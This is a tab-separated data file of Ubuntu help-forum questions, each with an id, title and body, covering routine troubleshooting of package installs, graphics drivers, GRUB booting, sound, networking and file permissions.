485104	question about permissions in ubuntu	i am currently trying to download linaro lava onto my virtualmachine . when i do this command i am getting a permission denied error : echo 'deb http : //people.linaro.org/~neil.williams/ubuntu/ trusty main ' > /etc/apt/sources.d/lava.list some quick help on this would be appreciated
485111	combine feeds from facebook and twitter ?	i was just wondering if there was a way to combine the feeds from facebook and twitter in ubuntu ? i added my accounts in the online accounts section but dont see a way to combine the feeds . thanks !
485112	empathy does not allow to add facebook profile account	empathy does not allow me to add my facebook profile account in ubuntu 13.04 . it is showing the following error message . how can i resolve this ? if anyone could help me ? error accessing app we 're sorry , but the application you 're trying to use does n't exist or has been disabled .
485118	package operation failed	i 'm trying to install virtual-box through software centeron my ubuntu 12.04 but it is giving me following error dpkg : considering removing virtualbox in favour of virtualbox-4.3 ... dpkg : no , can not proceed with removal of virtualbox ( -- auto-deconfigure will help ) : virtualbox-dkms depends on virtualbox ( > = 4.1.12-dfsg-2ubuntu0.6 ) virtualbox is to be removed . dpkg : regarding ... /virtualbox-4.3_4.3.12-93733~ubuntu~precise_i386 ( 1 ) .deb containing virtualbox-4.3 : virtualbox-4.3 conflicts with virtualbox virtualbox ( version 4.1.12-dfsg-2ubuntu0.6 ) is present and installed . dpkg : error processing /home/android/documents/virtualbox-4.3_4.3.12-93733~ubuntu~precise_i386 ( 1 ) .deb ( -- install ) : conflicting packages - not installing virtualbox-4.3 i was previously installed a virtual box but from morning it was not opening at all so tried to install fresh version . now older version is not opening and fresh version is not installing . need suggestion to remove previous version completely and install fresh version . thanking you all . edit 1 : tried to remove completely but got error like this sudo apt-get purge -s virtualbox* reading package lists ... done building dependency tree reading state information ... done e : unable to locate package virtualbox-4.3_4.3.6-91406~ubuntu~raring_i386.deb e : could n't find any package by regex 'virtualbox-4.3_4.3.6-91406~ubuntu~raring_i386.deb' edit 2 : sudo apt-get purge -s virtualbox removed all related files sudo apt-get autoremove removed all related file ( including some needed files ) edit 3 : as suggested changed directory and tried got reading package lists ... done building dependency tree reading state information ... done note , selecting 'virtualbox-dbg ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-guest-x11 ' for regex 'virtualbox*' note , selecting 'virtualbox ' for regex 'virtualbox*' note , selecting 'virtualbox-source ' for regex 'virtualbox*' note , selecting 'virtualbox-ose ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-dkms ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-x11 ' for regex 'virtualbox*' note , selecting 'virtualbox-2.0 ' for regex 'virtualbox*' note , selecting 'virtualbox-2.1 ' for regex 'virtualbox*' note , selecting 'virtualbox-2.2 ' for regex 'virtualbox*' note , selecting 'virtualbox-3.0 ' for regex 'virtualbox*' note , selecting 'virtualbox-3.1 ' for regex 'virtualbox*' note , selecting 'virtualbox-3.2 ' for regex 'virtualbox*' note , selecting 'virtualbox-4.0 ' for regex 'virtualbox*' note , selecting 'virtualbox-4.1 ' for regex 'virtualbox*' note , selecting 'virtualbox-4.3 ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-guest-utils ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-dkms ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-additions-iso ' for regex 'virtualbox*' note , selecting 'virtualbox-dkms ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-source ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-additions ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-guest-source ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-qt ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-dbg ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-fuse ' for regex 'virtualbox*' note , selecting 'virtualbox-qt ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-source ' for regex 'virtualbox*' note , selecting 'virtualbox-fuse ' for regex 'virtualbox*' note , selecting 'virtualbox-guest-utils ' for regex 'virtualbox*' note , selecting 'virtualbox-ose-guest-dkms ' for regex 'virtualbox*' package virtualbox-guest-additions is not installed , so not removed package virtualbox-guest-additions-iso is not installed , so not removed package virtualbox-dbg is not installed , so not removed package virtualbox-fuse is not installed , so not removed package virtualbox-guest-dkms is not installed , so not removed package virtualbox-guest-source is not installed , so not removed package virtualbox-guest-utils is not installed , so not removed package virtualbox-guest-x11 is not installed , so not removed package virtualbox-ose is not installed , so not removed package virtualbox-ose-dbg is not installed , so not removed package virtualbox-ose-dkms is not installed , so not removed package virtualbox-ose-fuse is not installed , so not removed package virtualbox-ose-guest-dkms is not installed , so not removed package virtualbox-ose-guest-source is not installed , so not removed package virtualbox-ose-guest-utils is not installed , so not removed package virtualbox-ose-guest-x11 is not installed , so not removed package virtualbox-ose-qt is not installed , so not removed package virtualbox-ose-source is not installed , so not removed package virtualbox-source is not installed , so not removed the following packages were automatically installed and are no longer required : dkms libgsoap1 use 'apt-get autoremove ' to remove them . the following packages will be removed : virtualbox* virtualbox-4.3* virtualbox-dkms* virtualbox-qt* 0 upgraded , 0 newly installed , 4 to remove and 278 not upgraded . purg virtualbox-dkms [ 4.1.12-dfsg-2ubuntu0.6 ] purg virtualbox [ 4.1.12-dfsg-2ubuntu0.6 ] purg virtualbox-4.3 purg virtualbox-qt tried to install but getting the same error
485119	testing multiple desktops simultaniously	our college is installing new ubuntu installed systems for our lab.they want to test the performance of the systems.i googled some benchmarking tools but we have 250 systems to test , is there a easy way other than installing benchmarking tool in each systems and running them ? ?
485122	how do i disable the dash preview ?	i would like to have it configured so that a single click opens my folders and documents from the dash . currently , when i single click a document or folder , it opens up some in-dash preview dialog box , forcing me to either click `` open in folder '' or to double-click the object to open it . is there any way to disable the preview option ? running ubuntu 14.04 64-bit w/ unity 7 . thanks !
485123	installing openssh-server on a virtual machine	i am unable to install openssh-server on an ubuntu 13.10 virtual machine . here is the command i used and it 's output : sudo apt-get install openssh-server [ sudo ] password for mohamed : reading package lists ... done building dependency tree reading state information ... done package openssh-server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'openssh-server ' has no installation candidate
485124	usb key - folder parameters - changing access rights	there is an ms windows computer in my lab , which is sadly infected by some strange trojans and viruses . one usb key got into trouble while it was plugged on to the computer . scanning with an antivirus ( mcafee ) removed all the viruses . i put this particular usb key into my linux machine and i was able to see all the folders . however , on a windows machine , these folders and files were not visible . by issuing attrib -h -s * i was able to make some of the files visible . however , the folders wo n't still be visible . is there any linux command with which i could make these folders visible again on the windows machine ?
485126	install on xp server with no dvd/cd drives , and no usb booting ?	so i have this really old server here with xp installed on it , but it has no cd/dvd drives , and is too old for usb booting . what 's a good way to install debian or lubuntu over the windows installation ? ( not side-by-side ) . edit : i tried unetbootin but i 'm getting a windows error when i select the option at startup .
485127	screen resolution	i have just uploaded ubuntu 14.04 to my oracle vm v.4.3.12 running on windows 7 . problem : i can not change the screen resolution . in the ubuntu settings > screen display , it says `` built-in display '' 640x480 , and i am unable to change it . i have downloaded the latest guest extensions .
485134	how to store system ( `` date + % s ) output to variable ? c++	here 's my problem , when i try to do long int second ; second=system ( `` date + % s ) ; and then export the `` second '' to a text file i get 0 instead of 1403109 ... how can i export the output of this command to a text whenever the second changes ?
485135	after installing 14.04 lts 32-bit , system locks on `` disk boot failure , insert system disk and press enter ''	i am installing 14.04 lts 32-bit on an athlon 700mx with nvidia graphics card , 10 gig hd and 2 gig ram . after installing the software all i keep getting is the error above . i have tried gpart , auto disk rebuild , re-mounting . and it never gets free of the error on the front end . system boots to installer/trial with any bootable dvd or usb installer . system set in bios to dvd/usb/hdd-1 . what could be the problem . thanks .
485137	invalid version string 'gnu/linux ' '' when creating bootable usb stick	when i tried to create a bootable usb stick , appear this massege below invalid version string 'gnu/linux ' '' how can i create a bootable usb stick on ubuntu 14.04 ?
485139	communication between linux containers ( lxc )	i have a container for my apache webserver , and another one for my mysql server . i have given them 2 static ips name state ipv4 ipv6 autostart -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - apache running 10.0.3.10 - yes mysql running 10.0.3.20 - yes the problem i have is that i ca n't seem to reach the mysql server from the apache server . if i run this on the mysql server : mysql -h 127.0.0.1 -u root -p i have no problem logging in , but if i run this on the web server : mysql -h 10.0.3.20 -u root -p i get this error : error 2003 ( hy000 ) : ca n't connect to mysql server on '10.0.3.20 ' ( 111 ) what am i missing ?
485145	portable ubuntu , how to auto install the correct ati/nvidia driver when booting ?	that is . i do n't want to have both drivers installed at the same time . i just want to make an init script or whatever which will choose the correct driver for the video card currently installed during the boot . i do n't think that this is impossible with the *nix ideology that everything is the file . roughly , i think that should be possible to pack all driver-related files into two archives , amd.tar and nvidia.tar do lspci before video driver is loaded and extract the needed one to the root filesystem . the reason why i need this is that i have a portable installation of the ubuntu which works well on every machine whichever i tried . the only issue with it is in fact that i need to reinstall drivers manually from the recovery mode everytime i use the computer with the graphical card different to the previous one . any suggestions would be greatly appreciated . thanks !
485147	xubuntu : compiz using 100 % + cpu	i seem to be experiencing an issue with compiz in terms of cpu usage . the only thing i 've been doing differently ( been running this system for a month or two with no issues ) is i have been running virtualbox for a windows environment inside my xubuntu host . what i 'm seeing happen is : boot up , all is well open virtual box , all seems well here too i use multiple work spaces , so i 'm often switching around , and this is when i typically notice that things are now frozen . at some point , i 'll switch to a workspace , and find that things are unresponsive . i can usually still use the mouse , but nothing really responds after this point . drop to tty1 , run top and compiz is using 100 % cpu . any attempts to kill the compiz process does n't really do anything ( ie kill , pkill , killall , etc ... ) . it wo n't die . restart lightdm and repeat the process . some stats if they are helpful : greg @ zero-cool : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gm107 [ geforce gtx 750 ti ] ( rev a2 ) greg @ zero-cool : ~ $ glxinfo | grep render direct rendering : yes opengl renderer string : geforce gtx 750 ti/pcie/sse2 gl_ktx_buffer_region , gl_nvx_conditional_render , gl_nvx_gpu_memory_info , gl_nv_compute_program5 , gl_nv_conditional_render , gl_nv_parameter_buffer_object2 , gl_nv_path_rendering , gl_ktx_buffer_region , gl_nvx_conditional_render , gl_nvx_gpu_memory_info , gl_nv_compute_program5 , gl_nv_conditional_render , gl_nv_parameter_buffer_object2 , gl_nv_path_rendering , i can provide my xorg log too , if that would be helpful . thanks so much for reading , hopefully i can find out what is causing my cpu to peg and bring everything to a halt . one thing of note , i use vagrant for development , and i have not had any issues running virutalbox in a headless state , it just seems to be when i run that windows guest ( for photoshop , fireworks , etc ... ) that i 'm seeing this issue . edit : i initially thought this was related to virtualbox , but i just experienced the same issue without using virtualbox . so now it 's just seems to be that compiz will randomly ( in that i have n't been able to detect an event that causes it ) begin using 100 % cpu and i have to restart lightdm which kills my previous session and i have to reopen everything again ... sigh .
485150	whenever i try to download my ubuntu 1 files , chrome block me .	i received an email regarding the closure of ubuntu1 files i tried using the link to transfer ( os is windows 7 ultimate ) each time i tried i received error message chrome blocked download , is malicious . i ca n't even remember how to view my files to see if any could be removed . please let me know what are my alternatives in retrieving my files .
485154	lubuntu desktop not loading on admin user	my lubuntu crashed , and after reboot , when i log in on any of my administrator accounts , it would show the default wallpaper and the mouse pointer . also , ca n't open the terminal or any other keyboard shortcuts . i can log in using the guest account , but it does n't have permission to do most actions . i were also able to log in my account using openbox mode , but most admin actions were supressed too . i ca n't create a new user ( i was hoping the new user could log in ok , since the guest could . the only option is to re-download and re-install lubuntu , but i do n't have a fast enough web connection ( and i would also lose all my data ) . what can i do to reset my user , or create a new one ?
485156	making a boot partition - beginner	okay . so i 'll cut to the chase . i keep getting the 'gave up waiting for root device ' error ( the standard one that most people are getting ) . i 've gathered from a few forum posts that i need a boot partition . i 'm an absolute ubuntu beginner and this is a fresh ubuntu install . if you need any more info , ask in the comments and i 'll add them . cheers all , luca edit 1 : are you dual-booting ? - nope . only ubuntu , i installed from a live usb and then when i first tried to boot , it gave me the 'gave up waiting ... ' error .
485157	can not find -lgl but i 've install nvidia driver	i 'm trying to compile a simple `` hello world '' programm in qt creator , but i always get this message : < update > g++ -wl , -rpath , /home/paul/apps/qt/5.3/gcc_64 -wl , -rpath , /home/paul/apps/qt/5.3/gcc_64/lib -o hello_world main.o qrc_qml.o -l/home/paul/apps/qt/5.3/gcc_64/lib -lqt5quick -lqt5qml -lqt5widgets -lqt5network -lqt5gui -lqt5core -lgl -lpthread < /update > /usr/bin/ld : can not find -lgl as already said in the headline , i 've the nvidia driver installed and when i run ldconfig -p | grep libgl.so i get this : paul @ kreker-desktop : ~ $ ldconfig -p | grep libgl.so libgl.so.1 ( libc6 , x86-64 ) = > /usr/lib/nvidia-331-updates/libgl.so.1 libgl.so.1 ( libc6 ) = > /usr/lib32/nvidia-331-updates/libgl.so.1 libgl.so ( libc6 , x86-64 ) = > /usr/lib/nvidia-331-updates/libgl.so libgl.so ( libc6 ) = > /usr/lib32/nvidia-331-updates/libgl.so is there something i have to install that i missed or what can i do to get this working .
485159	how to skip grub screen and just boot to windows 7 ?	i tried a few things already . this is my /etc/default screen . this wont work . it still brings me to the grub screen and stays there until an os is selected . i do n't want that screen to come up . i want to go straight into windows 7 . any info would be nice . # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default= '' windows 7 ( loader ) ( on /dev/sda3 ) '' grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=1 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
485162	setup intel graphics 4000 on ubuntu 14.04	when i try to run vmware view client it says to me : `` this desktop does not support the requested display protocol . '' i searched for it and found that i have to setup video graphics , i tried to install additional driver but the system does not find or recognize any additional drivers . how can i solve this please ?
485168	cleaning up yesterday 's files via script	i would like to run a cronjob that ran every morning to move the files that were created on the previous day in a specific directory to be moved to a folder that has been created with the previous dates title . for example , motion creates a series of jpg files in a directory called snapshots . i would like to have the script run and find all the files that were created yesterday in the snapshots directory ( including avi files it has created ) , and move them into a folder with yesterday 's date as the title on it . has anyone tried this before ? does motion already have this functionality built in and i am just not seeing it ? the next step will be to have it auto purge itself after 7-14 days , but that 's a whole other post .
485169	playonlinux + bumblebee	since two days i tried to repair nvidia-prime and nvidia-settings changing graphic cards . i tried multiple versions and configurations , and of course every time i tried to change my video card an exclamation mark appeared , so i decided to use open source drivers instead of proprietary . how expected bumblebee works great , but i have some questions : how to check if ( and which ) app is using my video card ? how to add optirun or primusrun as starting parameter to every application in playonlinux ? ( i found this topic on official forum , but it migh be little outdated ) which is better - optirun or primusrun , and why , or they are same ?
485173	grub does n't run after installed ubuntu 14.04 on external hdd	today i installed ubuntu 14.04 on my external 1tb hdd . i created a 5gb swap space , and a 45gb ext4 partition mounted on / . the problem is : when i am booting from my hdd , it does not show up grub list for choosing ubuntu , it shows a blank screen and when waiting , nothing changes . could you tell me what the problem is , and how to solve it ?
485174	ca n't sync nokia lumia 800 on ubuntu 12.04	i am just started using ubuntu , and i came up with some issue . i have nokia 800 , which runs on windows phone 7.5 and to sync my files i have to use microsoft zune which runs only on mac and windows . on ubuntu i can not use microsoft zune because , i can not do anything with my file . i can not download or upload videos , audios or images . all that kind of stuff i can do only with zune it is like itunes for apple devices . how can i solve this to sync my files ? how can i connect my nokia to laptop on ubuntu , without wine ?
485176	use the content of a text file to form a condition	i am interested in getting the content of a text file and use it in a condition like : if ( text1.txt ! =text2.txt ) { text1.txt=text2.txt } i am also interested in checking the line ex . : if ( text1.txt ( line 5 ) =text2.txt ( line 2 ) { ... }
485178	microphone picking up system sound on ubuntu 14.04	hello i just got ubuntu dual booted with windows 8.1 and it is working well apart from the microphone picks up any system sounds such as youtube videos . i am using headphones so i know that the microphone is n't picking up the sound from the speakers . it does n't pick up the sounds if i mute the volume . this does n't happen on windows so i doubt it 's a hardware issue . does anyone know how to fix this ? the laptop is a lenovo flex 15
485179	very resilient graphics bug	i 've spent the past month or so at work using a box that seems cursed . backstory : we develop a piece of very graphics-heavy software , which uses lots of opencl , cuda , and so on . hence , we place high demands on our graphics hardware . this also means that i ca n't use the nouveau drivers , since we ca n't run our software with it . when i started at this job , i had a 12.10 box , with an amd firepro v5900 . after leaving the computer on for a few weeks , this problem started to show ; and it was soon followed by a host of other issues . these other issues ( flickering screen , black windows , and more ) are out of the question 's scope , as they 've been documented elsewhere , but from what i can tell , my problem is unique -- several times i have found pictures of what seems to be other instances of the issue , but closer study ( loading the page on another computer ) indicates that the glitches are on my end . what i see , whatever i might be doing on the computer , is this : these patches ( of 2-pixel tall holes ) flicker with every redraw , many of them changing positions . i 've spent a month working with it trying to fix the issue , and so far we have tried ( in order ) : upgrading to 13.10 booting into old kernel switching to gnome 3 ( it was worse ) switching to gnome metacity ( same as unity ) wiping the drive and installing 14.04 booting into old kernel swapping out the card for an nvidia quadro 5000 , rewiping drive and installing 14.04 again for good measure tried different monitor and cable tearing out all the guts , new mobo , new ram ( a weekend-long memtest turned up fine , but we were taking no chances ) , everything except the case new ; again rewiping drive and reinstalling trusty . testing with a beautiful new high-dpi monitor nothing worked -- every time , it would look nice and fresh , but it would be useless , so we 'd try a driver switch , but after switching to any other driver , the madness returns . the parts are all new ( now anyway ) , and nothing is , or ever has been , overclocked . what now ? in a few hours we 're wiping my drive again , this time to try precise . honestly , i 've lost enough productivity already , so if that does n't work i 'm switching to mint or arch or windows . right now , i 'd rather just document an odd bug , and perhaps get some help putting together a bug report ( and filing it in the right place ) . however , i may have just kept screwing up in subtle ways with my driver configuration . since i find that quite likely , i 've decided it would be best to ask here . so , any ideas ?
485180	macbook 3,1 : suspend when lid is closed	i 'm running ubuntu studio 14.04 on a macbook 3,1 and would like the laptop to suspend when closing the lid . however , the only options in the energy settings for actions when closing the lid are `` nothing '' and `` lock the screen '' . how can i get an option for suspend to show in the menu ?
485183	change the application icon theme but not changing the panel icons	downloading and setting a new icon theme modifies the top panel icons . i want to keep the panel icons ( ubuntu-mono-dark theme ) . is that possible ? how can i change the applications/folders & files icon theme ( for example moka theme ) , but keeping the default top panel icons ( ubuntu-mono-dark ) ? after setting moka theme , the panel icons are changed , and i do n't like them .
485184	lspci shows soundcard , but nothing else does	i installed ubuntu 14.04 on a computer with a gigabyte ga-990fxa-ud3 ( rev 1.0 ) motherboard . this motherboard has a realtek alc889 `` hd audio '' chip . however , the volume control only shows `` dummy output '' and i do not hear any sound . when i run lspci , the output includes the following line : 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) when i run find /lib/modules/`uname -r` | grep snd , i see lines for a number of codecs , including /lib/modules/3.13.0-29-generic/kernel/sound/pci/hda/snd-hda-codec-realtek.ko , which i would have thought is the correct one . modprobe -c | grep realtek shows that this codec is loaded . i was going to try installing the generic realtek hd audio driver , but i do n't want to mess things up if there 's a better way . if it matters , i am using xfce instead of unity .
485186	unity 's universal panel , dockbar and search engine for lxde	one of the things that i like in ubuntu is the panel on the top of the screen , that integrates with the maximized windows ; the dockbar on the left ( i could actually `` fake '' one a dockbar like that , but it did n't allow scrolling ) ; and the search engine on the windows key . but since my pc is too slow to run unity , i use lxde , wich does n't have any of those features . is there any apps i can download to reproduce those functions ?
485188	how to copy folders from a different account	i can no longer log into my account even having the correct password . i tried all the suggested advice on the site with no success . i also posted a question and am waiting for a reply . while i fix that issue however , i really need to access my files for work . i created a new account which is what i 'm using now and when i try to access my old account 's files it says i cant as i 'm not the owner . i 'd be happy being able to transfer my files from my old account onto this new one but i 'm unsure as to how i could do that . is there a way i could change the permissions on my previous account 's folder so that i can access and transfer my files onto my new account ? when i click on properties on that folder all the settings are blurred out and i cant change anything . i assume the only way to do it is through terminal . can someone please guide me on how to do this ? i 'm not super skilled at using terminal but i do have a little bit of experience with it . i would really appreciate any help you could offer me . thank you .
485190	installing ubuntu 14:04 along site with 8.1 and uefi . ca n't enter secure boot	i 've been trying to setup ubuntu 14.04 ( 64bit ) along with my win 8.1 desktop-pc . my problem is , that i have uefi instead of the normal bios . when i just install ubuntu as i did very often on other machines , and start my pc , it boots right into windows without entering grub . well , after some research , i figured out , that i have to switch off secure boot in my uefi . i found the following instructions . guide to install ubuntu 14.04 in dual boot mode with windows 8 or 8.1 uefi and how to disable uefi secure boot in windows 8 & 8.1 on the second link , there is a point , where i am supposed to enter the uefi-firmware-settings via windows . the problem is , my windows does n't show this option . when i boot straight into uefi , there is n't an option for secure boot or no equivalent either . i am using an asus motherboard . my uefi looks like this .
485193	i need someone to go through my conky scripts and correct my mistakes	i modified some conky scripts that i downloaded online . i cant quite figure out how to make the rss feed run . i tried two methods to get the rss feed - the rss command in conky ( used in dinamalar file ) and feed parser in python ( newstest , webup8test ) . another problem is my clock01_rings.lua doesnt seem to respond when called from conkyrctest . can anyone go through them and tell me what am doing wrong ? i have attached all the files with a screenshot of my desktop . thanks in advance ! ! ! my conky files
485206	how to disable lazy preempt in kernel	i 'm relatively new to linux and working on getting a real-time kernel up and running for robot applications . i 'm on ubuntu 14.04 , using kernel 3.14.3 and the 3.14.3-rt5 real-time patch . also using x86-64 . there 's a known error where the whole system crashes under some load when lazy preempt is enabled . this has happened to me a few times now . my question is : how do i disable lazy preempt ? i read to add no_preempt_lazy to the end of /sys/kernel/debug/sched_features , but when i try to do that ( using ~ $ sudo vim /sys/kernel/debug/sched_features ) , upon trying to save and exit ( : wq ) i get the following error : '' /sys/kernel/debug/sched_features '' '' /sys/kernel/debug/sched_features '' e667 : fsync failed warning : original file may be lost or damaged do n't quit the editor until the file is successfully written ! press enter or type command to continue if someone could help me get past the vim fsync failed or disable lazy preempt in another way , i would greatly appreciate it .
485207	share windows 8.1 folder with ubuntu 14.04	i have two standalone pc 's . one is windows 8.1 and the other is ubuntu 14.04 . i have a working network between the two . each machine can ping the other and i have internet shared via ethernet from the windows machine to the linux machine . one thing i ca n't seem to get right however is the sharing of a folder . i have installed samba etc and followed numerous forums and so called solutions but none of them seem to work . when i try to access the windows machine from the linux machine it give the error : unhandled error message : failed to retrieve share list from server : connection timed out
485211	how to enable the `` switch screens '' button in ubuntu 14.04 ?	some older ubuntu versions used to have this button that showed and overview of all screens and allowed to easily move windows between them . how can i enable it in ubuntu 14.04 ? i would like to have it back because it made moving app windows on a multi-monitor setup so much easier .
485213	help i wanto download codeblocks from spesific reposity and it downloads from the normal repository	i want to download codeblocks 13 from ppa : pasgui/ppa but it downloads 10 from the main repository . i used to download with apt-get install codeblocks they have the same filename . when i downloaded before it automatically downloaded from ppa : pasgui but now it downloads the 10 .
485214	chromium default -- audio-buffer-size=2048	in short i 've done a fresh install of ubuntu and as expected i 've encountered the same audio issues i had originally . i backed up my sources for the fixes except for one : crackling sounds within chromium . i solved this last time by changing the audio buffer size but can not figure it out this time round . this fix works perfectly for me if i run 'chromium-browser -- audio-buffer-size=2048 ' in the terminal . how can i make this permanent ? i recall changing a default file somewhere . thanks
485218	partition question for desktop 14.04 install from 10.04	tried to install 14.04 with dvd onto existing 10.04 desktop . the process froze after an error message something like 'could not delete files'which came after a 'deleting unneeded files ' message . i rebooted and next install said no operating system found . when i try install now via manual option , i get `` no root file system defined . please correct this from the partitioning menu . '' being linux illiterate , now i have frozen . obviously , i 'm hoping not to erase the existing data files from 10.04 . i see no option for creating a root file , so i ask for help . thanks , mike the partition screen is /dev/sda free space 320071 mb ( this is an unused drive from an abandoned project ) /dev/sdb /dev/sdb1 swap 8003mb -- 0mb used /dev/sdb2 ext3 12000mb -- 3140mb used /dev/sdb3 ext3 79999mb -- 42795mb used free space 220069mb
485220	ubuntu install fails due to no permissions for read/write access	so basically i 'm trying to install ubuntu to an external drive , however , it does n't let me partition the drive during install because i do not have read/write access . personally , i would run the install as root user , but how do i do this when booted from the live cd ? ( clicking try , not install ) ?
485223	why is there no sound ( not even alsamixer ) in my mac mini ?	i have a mac mini early 2007 . i installed ubuntu 14.04 lts i386 without using the bootcamp and just erasing all partitions ( i mean there is no os x on disk but only ubuntu. ) . i have had no problems . everything is working perfectly but there is no sound . on the tray bar there is sound indicator and seems like sound is working but somehow i could n't get sound from my speakers . at the system settings when i click sound -- > test sound , there is no sound . i searched on google and found some articles . i tried them out but still no sound . i tried typing this in a terminal : - sudo nano /etc/modules and added these lines to that file : - snd_aoa_i2sbus snd_aoa_fabric_layout snd_aoa_codec_tas snd_aoa_codec_onyx but no fix yet . also i tried alsamixer but it wont open stating : - no such file or directory i tried the solutions here but still no fix . now what can i do to fix my sound ?
485224	ubuntu 14 hibernate does not appear clear to me	i am recently come from windows 7 to ubuntu 14 how can the pc hibernate in ubuntu system ? i tried a command but it does n't work will thanks
485226	problem with external disk	during working on computer i accidentally disconnected external drive form computer . since then ubuntu does n't see disk . i tried to seek solution to me problems , but i failed . may be someone here will be able gave me answer after typing fdisk -l i have : /dev/sda1 * 2048 23437311 11717632 83 linux /dev/sda2 23439358 234438655 105499649 5 extended /dev/sda5 23439360 33202175 4881408 82 linux swap / solaris /dev/sda6 33204224 234438655 100617216 83 linux but lsusb gave : bus 001 device 004 : id 0480 : a008 toshiba america info . systems , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub will i be able to use this disk again ?
485227	why wo n't steam launch properly ? and why do i get these error messages ?	i have indeed set this as standard in the additional drivers settings for my nvidia geforce gtx 780 : using nvidia geforce binary driver version 311.38 from nvidia-311 ( proprietary , tested ) this is what steam says when i try to launch it : opengl glx context is not using direct rendering , which may cause performance problems . for more information visit https : //support.steampowered.com/kb_article.php ? ref=9938eyzb-7457 left 4 dead 2 says this : could not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated .
485229	how to check intel igpu frequency on linux ?	i own intel haswell g3420 . at stock its igpu has 1,15 ghz turbo frequency . in my uefi i overclocked the igpu to 1,5 ghz and added voltage . however the framerates in both benchmarks and games are the same after the oc . i once read that intel igpu oc does n't work on linux because of some problems with turbo boost in linux kernel . i want to check if the frequency while gaming hits 1,5 ghz or if it stays unchanged at 1,15 ghz . so i need a way to check current intel igpu frequency . i know that nvidia binary drivers are capable of that , however i have no idea how can i check it using intel igpu . tl ; dr how can i check intel igpu current frequency on linux ?
485231	color code of s file in vim	i am writing a .s file in vim . when the string '8d ' is written , it is coloured in yellow . why ? does '8d ' have any particular meaning in machine code ?
485241	speaker-test works but aplay needs super user	i have a headless server . i 'm trying to set up sounds good enough to play from vlc . if i call sudo aplay /usr/share/sounds/alsa/noise.wav i can hear the static . if i call it without sudo , i do n't . my user is a member of group `` audio '' . however , if i call speaker-test -dplug : surround51 -c6 -twav ( without calling sudo ) , i can hear the test sounds . so if i can play audio without being the super user , what 's wrong with my setup ? if i play with sudo , i see home directory not accessible : permission denied playing wave '/usr/share/sounds/alsa/noise.wav ' : signed 16 bit little endian , rate 48000 hz , mono but if i play without sudo , i see playing wave '/usr/share/sounds/alsa/noise.wav ' : signed 16 bit little endian , rate 48000 hz , mono the only difference is that playing without sudo does n't actually make noise .
485244	avidemux2.6 wo n't start	i installed avidemux2.6 on xubuntu 14.01 64-bit . i go to application menu - > multimedia - > avidemux2.6 ( gtk+ ) and it does nothing . no error message or anything . when i click on avidemux2.6 ( jobs ) it will bring up the jobs menu . i even tried right-clicking on a video file and choose `` open with avidemux2.6 ( gtk+ ) '' and it wo n't start that way either . any suggestions ?
485246	64bit ubuntu version issue	i had installed ubuntu 14.04 x64 recently on my toshiba with inter core i3 and 2gb of ram . my cpu supports 64bit os . the 64bit installer finished faster compared to when i installed the 32bit version of 14.04 . i 'm not sure but i think the graphics are far more crisp than the graphics of 32bit . however , the system seems to run very slow on a 64bit . i know that when you run a 64bit os , you should have more than 2gb of ram which this pc does n't have . however , when i looked at the system monitor , it does n't even consume more than 60 % of my ram but it still runs slow . why is that ? and how can i get the best out of my 64bit cpu architecture on a 2gb of ram if that will always be the case ?
485248	internet is slow after installing ubuntu 14.04	i am brand new to linux so please be gentle ! i installed ubuntu 14.04 and dual boot with windows 8.1 . after the install firefox was super slow compared to chrome in windows so i downloaded chrome . it was also slow compared to windows . when i run the lshw -c network command in the terminal ( i used the terminal ! ) this was the result : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 00:8c : fa:80:5e:16 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8106e-1_0.0.1 06/29/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:78 ioport:3000 ( size=256 ) memory : f1000000-f1000fff memory : f0000000-f0003fff *-network description : wireless interface product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 01 serial : b8 : ee:65:63:71 : e7 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8188ee driverversion=3.13.0-24-generic firmware=n/a 